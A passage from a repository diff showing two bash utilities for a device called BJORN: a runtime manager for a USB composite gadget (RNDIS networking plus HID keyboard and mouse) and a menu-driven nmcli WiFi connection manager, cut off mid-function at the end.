if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

430
bjorn_usb_gadget.sh Normal file
View File

@@ -0,0 +1,430 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Runtime manager for the BJORN USB composite gadget
# Usage:
# ./bjorn_usb_gadget.sh -u Bring the gadget up
# ./bjorn_usb_gadget.sh -d Bring the gadget down
# ./bjorn_usb_gadget.sh -r Reset the gadget (down + up)
# ./bjorn_usb_gadget.sh -l Show detailed status
# ./bjorn_usb_gadget.sh -h Show help
#
# Notes:
# This script no longer installs or removes the USB gadget stack.
# Installation is handled by the BJORN installer.
# This tool is for runtime diagnostics and recovery only.
set -u
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m'
SCRIPT_VERSION="2.0"
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
USB_GADGET_SERVICE="usb-gadget.service"
USB_GADGET_SCRIPT="/usr/local/bin/usb-gadget.sh"
DNSMASQ_SERVICE="dnsmasq.service"
DNSMASQ_CONFIG="/etc/dnsmasq.d/usb0"
MODULES_LOAD_FILE="/etc/modules-load.d/usb-gadget.conf"
MODULES_FILE="/etc/modules"
INTERFACES_FILE="/etc/network/interfaces"
mkdir -p "$LOG_DIR" 2>/dev/null || true
touch "$LOG_FILE" 2>/dev/null || true
log() {
local level="$1"
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
local color="$NC"
case "$level" in
ERROR) color="$RED" ;;
SUCCESS) color="$GREEN" ;;
WARNING) color="$YELLOW" ;;
INFO) color="$BLUE" ;;
SECTION) color="$CYAN" ;;
esac
printf '%s\n' "$message" >> "$LOG_FILE" 2>/dev/null || true
printf '%b%s%b\n' "$color" "$message" "$NC"
}
show_recent_logs() {
if command -v journalctl >/dev/null 2>&1 && systemctl list-unit-files --type=service | grep -q "^${USB_GADGET_SERVICE}"; then
log "INFO" "Recent ${USB_GADGET_SERVICE} logs:"
journalctl -u "$USB_GADGET_SERVICE" -n 20 --no-pager 2>/dev/null || true
fi
}
ensure_root() {
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This command must be run as root. Please use sudo."
exit 1
fi
}
service_exists() {
systemctl list-unit-files --type=service 2>/dev/null | grep -q "^$1"
}
service_active() {
systemctl is-active --quiet "$1"
}
service_enabled() {
systemctl is-enabled --quiet "$1"
}
usb0_exists() {
ip link show usb0 >/dev/null 2>&1
}
print_divider() {
printf '%b%s%b\n' "$CYAN" "============================================================" "$NC"
}
detect_boot_paths() {
local cmdline=""
local config=""
if [ -f /boot/firmware/cmdline.txt ]; then
cmdline="/boot/firmware/cmdline.txt"
elif [ -f /boot/cmdline.txt ]; then
cmdline="/boot/cmdline.txt"
fi
if [ -f /boot/firmware/config.txt ]; then
config="/boot/firmware/config.txt"
elif [ -f /boot/config.txt ]; then
config="/boot/config.txt"
fi
printf '%s|%s\n' "$cmdline" "$config"
}
wait_for_condition() {
local description="$1"
local attempts="$2"
shift 2
local i=1
while [ "$i" -le "$attempts" ]; do
if "$@"; then
log "SUCCESS" "$description"
return 0
fi
log "INFO" "Waiting for $description ($i/$attempts)..."
sleep 1
i=$((i + 1))
done
log "WARNING" "$description not reached after ${attempts}s"
return 1
}
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-u${NC} Bring USB Gadget up"
echo -e " ${BLUE}-d${NC} Bring USB Gadget down"
echo -e " ${BLUE}-r${NC} Reset USB Gadget (down + up)"
echo -e " ${BLUE}-l${NC} List detailed USB Gadget status"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Examples:"
echo -e " $0 -u Start the BJORN composite gadget"
echo -e " $0 -d Stop the BJORN composite gadget cleanly"
echo -e " $0 -r Reinitialize the gadget if RNDIS/HID is stuck"
echo -e " $0 -l Show services, usb0, /dev/hidg*, and boot config"
echo -e ""
echo -e "${YELLOW}This script no longer installs or removes USB Gadget.${NC}"
echo -e "${YELLOW}That part is handled by the BJORN installer.${NC}"
if [ "${1:-exit}" = "return" ]; then
return 0
fi
exit 0
}
list_usb_gadget_info() {
local boot_pair
local cmdline_file
local config_file
boot_pair="$(detect_boot_paths)"
cmdline_file="${boot_pair%%|*}"
config_file="${boot_pair##*|}"
print_divider
log "SECTION" "BJORN USB Gadget Status"
print_divider
log "INFO" "Expected layout: RNDIS usb0 + HID keyboard /dev/hidg0 + HID mouse /dev/hidg1"
log "INFO" "Script version: ${SCRIPT_VERSION}"
log "INFO" "Log file: ${LOG_FILE}"
print_divider
log "SECTION" "Service Status"
if service_exists "$USB_GADGET_SERVICE"; then
service_active "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is active" || log "WARNING" "${USB_GADGET_SERVICE} is not active"
service_enabled "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is enabled at boot" || log "WARNING" "${USB_GADGET_SERVICE} is not enabled at boot"
else
log "ERROR" "${USB_GADGET_SERVICE} is not installed on this system"
fi
if service_exists "$DNSMASQ_SERVICE"; then
service_active "$DNSMASQ_SERVICE" && log "SUCCESS" "${DNSMASQ_SERVICE} is active" || log "WARNING" "${DNSMASQ_SERVICE} is not active"
else
log "WARNING" "${DNSMASQ_SERVICE} is not installed"
fi
print_divider
log "SECTION" "Runtime Files"
[ -x "$USB_GADGET_SCRIPT" ] && log "SUCCESS" "${USB_GADGET_SCRIPT} is present and executable" || log "ERROR" "${USB_GADGET_SCRIPT} is missing or not executable"
[ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is available" || log "WARNING" "/dev/hidg0 (keyboard) is not present"
[ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is available" || log "WARNING" "/dev/hidg1 (mouse) is not present"
if ip link show usb0 >/dev/null 2>&1; then
log "SUCCESS" "usb0 network interface exists"
ip -brief addr show usb0 2>/dev/null || true
else
log "WARNING" "usb0 network interface is missing"
fi
if [ -d /sys/kernel/config/usb_gadget/g1 ]; then
log "SUCCESS" "Composite gadget directory exists: /sys/kernel/config/usb_gadget/g1"
find /sys/kernel/config/usb_gadget/g1/functions -maxdepth 1 -mindepth 1 -type d 2>/dev/null || true
else
log "WARNING" "No active gadget directory found under /sys/kernel/config/usb_gadget/g1"
fi
print_divider
log "SECTION" "Boot Configuration"
if [ -n "$cmdline_file" ] && [ -f "$cmdline_file" ]; then
grep -q "modules-load=dwc2" "$cmdline_file" && log "SUCCESS" "dwc2 boot module load is configured in ${cmdline_file}" || log "WARNING" "dwc2 boot module load not found in ${cmdline_file}"
else
log "WARNING" "cmdline.txt not found"
fi
if [ -n "$config_file" ] && [ -f "$config_file" ]; then
grep -q "^dtoverlay=dwc2" "$config_file" && log "SUCCESS" "dtoverlay=dwc2 is present in ${config_file}" || log "WARNING" "dtoverlay=dwc2 not found in ${config_file}"
else
log "WARNING" "config.txt not found"
fi
[ -f "$DNSMASQ_CONFIG" ] && log "SUCCESS" "${DNSMASQ_CONFIG} exists" || log "WARNING" "${DNSMASQ_CONFIG} is missing"
[ -f "$MODULES_LOAD_FILE" ] && log "INFO" "${MODULES_LOAD_FILE} exists (64-bit style module loading)"
[ -f "$MODULES_FILE" ] && grep -q "^libcomposite" "$MODULES_FILE" && log "INFO" "libcomposite is referenced in ${MODULES_FILE}"
[ -f "$INTERFACES_FILE" ] && grep -q "^allow-hotplug usb0" "$INTERFACES_FILE" && log "INFO" "usb0 legacy interface config detected in ${INTERFACES_FILE}"
print_divider
log "SECTION" "Quick Recovery Hints"
log "INFO" "If RNDIS or HID is stuck, run: sudo $0 -r"
log "INFO" "If startup still fails, inspect logs with: sudo journalctl -u ${USB_GADGET_SERVICE} -f"
log "INFO" "If HID nodes never appear after installer changes, a reboot may still be required"
}
bring_usb_gadget_down() {
ensure_root
print_divider
log "SECTION" "Bringing USB gadget down"
print_divider
if service_exists "$USB_GADGET_SERVICE"; then
if service_active "$USB_GADGET_SERVICE"; then
log "INFO" "Stopping ${USB_GADGET_SERVICE}..."
if systemctl stop "$USB_GADGET_SERVICE"; then
log "SUCCESS" "Stopped ${USB_GADGET_SERVICE}"
else
log "ERROR" "Failed to stop ${USB_GADGET_SERVICE}"
show_recent_logs
return 1
fi
else
log "INFO" "${USB_GADGET_SERVICE} is already stopped"
fi
else
log "WARNING" "${USB_GADGET_SERVICE} is not installed, trying direct runtime cleanup"
if [ -x "$USB_GADGET_SCRIPT" ]; then
"$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || true
fi
fi
if [ -x "$USB_GADGET_SCRIPT" ] && [ -d /sys/kernel/config/usb_gadget/g1 ]; then
log "INFO" "Running direct gadget cleanup via ${USB_GADGET_SCRIPT} stop"
"$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || log "WARNING" "Direct cleanup reported a non-fatal issue"
fi
if ip link show usb0 >/dev/null 2>&1; then
log "INFO" "Bringing usb0 interface down"
ip link set usb0 down >> "$LOG_FILE" 2>&1 || log "WARNING" "usb0 could not be forced down (often harmless)"
else
log "INFO" "usb0 is already absent"
fi
[ -c /dev/hidg0 ] && log "WARNING" "/dev/hidg0 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg0 is no longer exposed"
[ -c /dev/hidg1 ] && log "WARNING" "/dev/hidg1 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg1 is no longer exposed"
ip link show usb0 >/dev/null 2>&1 && log "WARNING" "usb0 still exists after stop" || log "SUCCESS" "usb0 is no longer present"
}
bring_usb_gadget_up() {
ensure_root
print_divider
log "SECTION" "Bringing USB gadget up"
print_divider
if [ ! -x "$USB_GADGET_SCRIPT" ]; then
log "ERROR" "${USB_GADGET_SCRIPT} is missing. The gadget runtime is not installed."
return 1
fi
if service_exists "$USB_GADGET_SERVICE"; then
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload >> "$LOG_FILE" 2>&1 || log "WARNING" "systemd daemon-reload reported an issue"
log "INFO" "Starting ${USB_GADGET_SERVICE}..."
if systemctl start "$USB_GADGET_SERVICE"; then
log "SUCCESS" "Start command sent to ${USB_GADGET_SERVICE}"
else
log "ERROR" "Failed to start ${USB_GADGET_SERVICE}"
show_recent_logs
return 1
fi
else
log "WARNING" "${USB_GADGET_SERVICE} is not installed, running ${USB_GADGET_SCRIPT} directly"
if "$USB_GADGET_SCRIPT" >> "$LOG_FILE" 2>&1; then
log "SUCCESS" "Runtime script executed directly"
else
log "ERROR" "Runtime script failed"
return 1
fi
fi
wait_for_condition "${USB_GADGET_SERVICE} to become active" 10 service_active "$USB_GADGET_SERVICE" || true
wait_for_condition "usb0 to appear" 12 usb0_exists || true
if service_exists "$DNSMASQ_SERVICE"; then
log "INFO" "Restarting ${DNSMASQ_SERVICE} to refresh DHCP on usb0"
systemctl restart "$DNSMASQ_SERVICE" >> "$LOG_FILE" 2>&1 || log "WARNING" "Failed to restart ${DNSMASQ_SERVICE}"
fi
[ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is ready" || log "WARNING" "/dev/hidg0 not present yet"
[ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is ready" || log "WARNING" "/dev/hidg1 not present yet"
if ip link show usb0 >/dev/null 2>&1; then
log "SUCCESS" "usb0 is present"
ip -brief addr show usb0 2>/dev/null || true
else
log "WARNING" "usb0 is still missing after startup"
fi
log "INFO" "If HID is still missing after a clean start, a reboot can still be required depending on the board/kernel state"
}
reset_usb_gadget() {
ensure_root
print_divider
log "SECTION" "Resetting USB gadget (down + up)"
print_divider
bring_usb_gadget_down || log "WARNING" "Down phase reported an issue, continuing with recovery"
log "INFO" "Waiting 2 seconds before bringing the gadget back up"
sleep 2
bring_usb_gadget_up
}
display_main_menu() {
while true; do
clear
print_divider
echo -e "${CYAN} BJORN USB Gadget Runtime Manager v${SCRIPT_VERSION}${NC}"
print_divider
echo -e "${BLUE} 1.${NC} Bring USB Gadget up"
echo -e "${BLUE} 2.${NC} Bring USB Gadget down"
echo -e "${BLUE} 3.${NC} Reset USB Gadget (down + up)"
echo -e "${BLUE} 4.${NC} List detailed USB Gadget status"
echo -e "${BLUE} 5.${NC} Show help"
echo -e "${BLUE} 6.${NC} Exit"
echo -e ""
echo -e "${YELLOW}Note:${NC} installation/removal is no longer handled here."
echo -n -e "${GREEN}Choose an option (1-6): ${NC}"
read -r choice
case "$choice" in
1)
bring_usb_gadget_up
echo ""
read -r -p "Press Enter to return to the menu..."
;;
2)
bring_usb_gadget_down
echo ""
read -r -p "Press Enter to return to the menu..."
;;
3)
reset_usb_gadget
echo ""
read -r -p "Press Enter to return to the menu..."
;;
4)
list_usb_gadget_info
echo ""
read -r -p "Press Enter to return to the menu..."
;;
5)
show_usage return
echo ""
read -r -p "Press Enter to return to the menu..."
;;
6)
log "INFO" "Exiting BJORN USB Gadget Runtime Manager"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1 and 6."
sleep 2
;;
esac
done
}
while getopts ":udrlhf" opt; do
case "$opt" in
u)
bring_usb_gadget_up
exit $?
;;
d)
bring_usb_gadget_down
exit $?
;;
r)
reset_usb_gadget
exit $?
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
f)
log "ERROR" "Option -f (install) has been removed. Use -u to bring the gadget up or -r to reset it."
show_usage
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

786
bjorn_wifi.sh Normal file
View File

@@ -0,0 +1,786 @@
#!/bin/bash
# WiFi Manager Script Using nmcli
# Author: Infinition
# Version: 1.6
# Description: This script provides a simple menu interface to manage WiFi connections using nmcli.
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
case $level in
"INFO") echo -e "${GREEN}[INFO]${NC} $*" ;;
"WARN") echo -e "${YELLOW}[WARN]${NC} $*" ;;
"ERROR") echo -e "${RED}[ERROR]${NC} $*" ;;
"DEBUG") echo -e "${BLUE}[DEBUG]${NC} $*" ;;
esac
}
# ============================================================
# Check if Script is Run as Root
# ============================================================
if [ "$EUID" -ne 0 ]; then
log "ERROR" "This script must be run as root."
exit 1
fi
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e " ${BLUE}-f${NC} Force refresh of WiFi connections"
echo -e " ${BLUE}-c${NC} Clear all saved WiFi connections"
echo -e " ${BLUE}-l${NC} List all available WiFi networks"
echo -e " ${BLUE}-s${NC} Show current WiFi status"
echo -e " ${BLUE}-a${NC} Add a new WiFi connection"
echo -e " ${BLUE}-d${NC} Delete a WiFi connection"
echo -e " ${BLUE}-m${NC} Manage WiFi Connections"
echo -e ""
echo -e "Example: $0 -a"
exit 1
}
# ============================================================
# Function to Check Prerequisites
# ============================================================
check_prerequisites() {
log "INFO" "Checking prerequisites..."
local missing_packages=()
# Check if nmcli is installed
if ! command -v nmcli &> /dev/null; then
missing_packages+=("network-manager")
fi
# Check if NetworkManager service is running
if ! systemctl is-active --quiet NetworkManager; then
log "WARN" "NetworkManager service is not running. Attempting to start it..."
systemctl start NetworkManager
sleep 2
if ! systemctl is-active --quiet NetworkManager; then
log "ERROR" "Failed to start NetworkManager. Please install and start it manually."
exit 1
else
log "INFO" "NetworkManager started successfully."
fi
fi
# Install missing packages if any
if [ ${#missing_packages[@]} -gt 0 ]; then
log "WARN" "Missing packages: ${missing_packages[*]}"
log "INFO" "Attempting to install missing packages..."
apt-get update
apt-get install -y "${missing_packages[@]}"
# Verify installation
for package in "${missing_packages[@]}"; do
if ! dpkg -l | grep -q "^ii.*$package"; then
log "ERROR" "Failed to install $package."
exit 1
fi
done
fi
log "INFO" "All prerequisites are met."
}
# ============================================================
# Function to Handle preconfigured.nmconnection
# ============================================================
handle_preconfigured_connection() {
preconfigured_file="/etc/NetworkManager/system-connections/preconfigured.nmconnection"
if [ -f "$preconfigured_file" ]; then
echo -e "${YELLOW}A preconfigured WiFi connection exists (preconfigured.nmconnection).${NC}"
echo -n -e "${GREEN}Do you want to delete it and recreate connections with individual SSIDs? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
# Extract SSID from preconfigured.nmconnection
ssid=$(grep "^ssid=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
if [ -z "$ssid" ]; then
log "WARN" "SSID not found in preconfigured.nmconnection. Cannot recreate connection."
else
# Extract security type
security=$(grep "^security=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
# Delete preconfigured.nmconnection
log "INFO" "Deleting preconfigured.nmconnection..."
rm "$preconfigured_file"
systemctl restart NetworkManager
sleep 2
# Recreate the connection with SSID name
echo -n -e "${GREEN}Do you want to recreate the connection for SSID '$ssid'? (y/n): ${NC}"
read recreate_confirm
if [[ "$recreate_confirm" =~ ^[Yy]$ ]]; then
# Check if connection already exists
if nmcli connection show "$ssid" &> /dev/null; then
log "WARN" "A connection named '$ssid' already exists."
else
# Prompt for password if necessary
if [ "$security" == "none" ] || [ "$security" == "--" ] || [ -z "$security" ]; then
# Open network
log "INFO" "Creating open connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" name "$ssid"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
else
log "INFO" "Creating secured connection for SSID '$ssid'..."
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
fi
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated connection for '$ssid'."
else
log "ERROR" "Failed to recreate connection for '$ssid'."
fi
fi
else
log "INFO" "Connection recreation cancelled."
fi
fi
else
log "INFO" "Preconfigured connection retained."
fi
fi
}
# ============================================================
# Function to List All Available WiFi Networks and Connect
# ============================================================
list_wifi_and_connect() {
log "INFO" "Scanning for available WiFi networks..."
nmcli device wifi rescan
sleep 2
while true; do
clear
available_networks=$(nmcli -t -f SSID,SECURITY device wifi list)
if [ -z "$available_networks" ]; then
log "WARN" "No WiFi networks found."
echo ""
else
# Remove lines with empty SSIDs (hidden networks)
network_list=$(echo "$available_networks" | grep -v '^:$')
if [ -z "$network_list" ]; then
log "WARN" "No visible WiFi networks found."
echo ""
else
echo -e "${CYAN}Available WiFi Networks:${NC}"
declare -A SSIDs
declare -A SECURITIES
index=1
while IFS=: read -r ssid security; do
# Handle hidden SSIDs
if [ -z "$ssid" ]; then
ssid="<Hidden SSID>"
fi
SSIDs["$index"]="$ssid"
SECURITIES["$index"]="$security"
printf "%d. %-40s (%s)\n" "$index" "$ssid" "$security"
index=$((index + 1))
done <<< "$network_list"
fi
fi
echo ""
echo -e "${YELLOW}The list will refresh every 5 seconds. Press 'c' to connect, enter a number to connect, or 'q' to quit.${NC}"
echo -n -e "${GREEN}Enter choice (number/c/q): ${NC}"
read -t 5 input
if [ $? -eq 0 ]; then
if [[ "$input" =~ ^[Qq]$ ]]; then
log "INFO" "Exiting WiFi list."
return
elif [[ "$input" =~ ^[Cc]$ ]]; then
# Handle connection via 'c'
echo ""
echo -n -e "${GREEN}Enter the number of the network to connect: ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to continue..."
elif [[ "$input" =~ ^[0-9]+$ ]]; then
# Handle connection via number
selection="$input"
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
ssid_selected="${SSIDs[$selection]}"
security_selected="${SECURITIES[$selection]}"
echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
# Open network
log "INFO" "Connecting to open network '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
else
# Secured network
echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
read -s password
echo ""
if [ -z "$password" ]; then
log "ERROR" "Password cannot be empty."
sleep 2
continue
fi
log "INFO" "Connecting to '$ssid_selected'..."
nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid_selected'."
else
log "ERROR" "Failed to connect to '$ssid_selected'."
fi
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to continue..."
else
log "ERROR" "Invalid input."
sleep 2
fi
fi
done
}
# ============================================================
# Function to Show Current WiFi Status
# ============================================================
show_wifi_status() {
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Current WiFi Status ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
# Check if WiFi is enabled
wifi_enabled=$(nmcli radio wifi)
echo -e "▶ WiFi Enabled : ${wifi_enabled}"
# Show active connection
# Remplacer SSID par NAME
active_conn=$(nmcli -t -f ACTIVE,NAME connection show --active | grep '^yes' | cut -d':' -f2)
if [ -n "$active_conn" ]; then
echo -e "▶ Connected to : ${GREEN}$active_conn${NC}"
else
echo -e "▶ Connected to : ${RED}Not Connected${NC}"
fi
# Show all saved connections
echo -e "\n${CYAN}Saved WiFi Connections:${NC}"
nmcli connection show | grep wifi
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Add a New WiFi Connection
# ============================================================
add_wifi_connection() {
echo -e "${CYAN}Add a New WiFi Connection${NC}"
echo -n "Enter SSID (Network Name): "
read ssid
echo -n "Enter WiFi Password (leave empty for open network): "
read -s password
echo ""
if [ -z "$ssid" ]; then
log "ERROR" "SSID cannot be empty."
sleep 2
return
fi
if [ -n "$password" ]; then
log "INFO" "Adding new WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" password "$password" name "$ssid"
else
log "INFO" "Adding new open WiFi connection for SSID: $ssid"
nmcli device wifi connect "$ssid" --ask name "$ssid"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid'."
else
log "ERROR" "Failed to connect to '$ssid'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Delete a WiFi Connection
# ============================================================
delete_wifi_connection() {
echo -e "${CYAN}Delete a WiFi Connection${NC}"
# Correctly filter connections by type '802-11-wireless'
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
if [ -z "$connections" ]; then
log "WARN" "No WiFi connections available to delete."
echo ""
read -p "Press Enter to return to the menu..."
return
fi
echo -e "${CYAN}Available WiFi Connections:${NC}"
index=1
declare -A CONNECTIONS
while IFS= read -r conn; do
echo -e "$index. $conn"
CONNECTIONS["$index"]="$conn"
index=$((index + 1))
done <<< "$connections"
echo ""
echo -n -e "${GREEN}Enter the number of the connection to delete (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
return
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
return
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
return
fi
conn_name="${CONNECTIONS[$selection]}"
# Backup the connection before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn_name}.nmconnection"
if nmcli connection show "$conn_name" &> /dev/null; then
log "INFO" "Backing up connection '$conn_name'..."
cp "/etc/NetworkManager/system-connections/$conn_name.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection. It might not be a preconfigured connection or backup location is inaccessible."
fi
else
log "WARN" "Connection '$conn_name' does not exist or cannot be backed up."
fi
log "INFO" "Deleting WiFi connection: $conn_name"
nmcli connection delete "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully deleted '$conn_name'."
else
log "ERROR" "Failed to delete '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Clear All Saved WiFi Connections
# ============================================================
clear_all_connections() {
echo -e "${YELLOW}Are you sure you want to delete all saved WiFi connections? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
log "INFO" "Deleting all saved WiFi connections..."
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
for conn in $connections; do
# Backup before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn}.nmconnection"
if nmcli connection show "$conn" &> /dev/null; then
cp "/etc/NetworkManager/system-connections/$conn.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection '$conn'."
fi
fi
nmcli connection delete "$conn"
log "INFO" "Deleted connection: $conn"
done
log "INFO" "All saved WiFi connections have been deleted."
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Manage WiFi Connections
# ============================================================
manage_wifi_connections() {
while true; do
clear
echo -e "${CYAN}Manage WiFi Connections${NC}"
echo -e "1. List WiFi Connections"
echo -e "2. Delete a WiFi Connection"
echo -e "3. Recreate a WiFi Connection from Backup"
echo -e "4. Back to Main Menu"
echo -n -e "${GREEN}Choose an option (1-4): ${NC}"
read choice
case $choice in
1)
# List WiFi connections
clear
echo -e "${CYAN}Saved WiFi Connections:${NC}"
nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}'
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
2)
delete_wifi_connection
;;
3)
# Liste des sauvegardes disponibles
backup_dir="$HOME/wifi_connection_backups"
if [ ! -d "$backup_dir" ]; then
log "WARN" "No backup directory found at '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
backups=("$backup_dir"/*.nmconnection)
if [ ${#backups[@]} -eq 0 ]; then
log "WARN" "No backup files found in '$backup_dir'."
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
continue
fi
echo -e "${CYAN}Available WiFi Connection Backups:${NC}"
index=1
declare -A BACKUPS
for backup in "${backups[@]}"; do
backup_name=$(basename "$backup" .nmconnection)
echo -e "$index. $backup_name"
BACKUPS["$index"]="$backup_name"
index=$((index + 1))
done
echo ""
echo -n -e "${GREEN}Enter the number of the connection to recreate (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
continue
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
continue
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
continue
fi
conn_name="${BACKUPS[$selection]}"
backup_file="$backup_dir/${conn_name}.nmconnection"
# Vérifier que le fichier de sauvegarde existe
if [ ! -f "$backup_file" ]; then
log "ERROR" "Backup file '$backup_file' does not exist."
sleep 2
continue
fi
log "INFO" "Recreating connection '$conn_name' from backup..."
cp "$backup_file" "/etc/NetworkManager/system-connections/" 2>/dev/null
if [ $? -ne 0 ]; then
log "ERROR" "Failed to copy backup file to NetworkManager directory. Check permissions."
sleep 2
continue
fi
# Set correct permissions
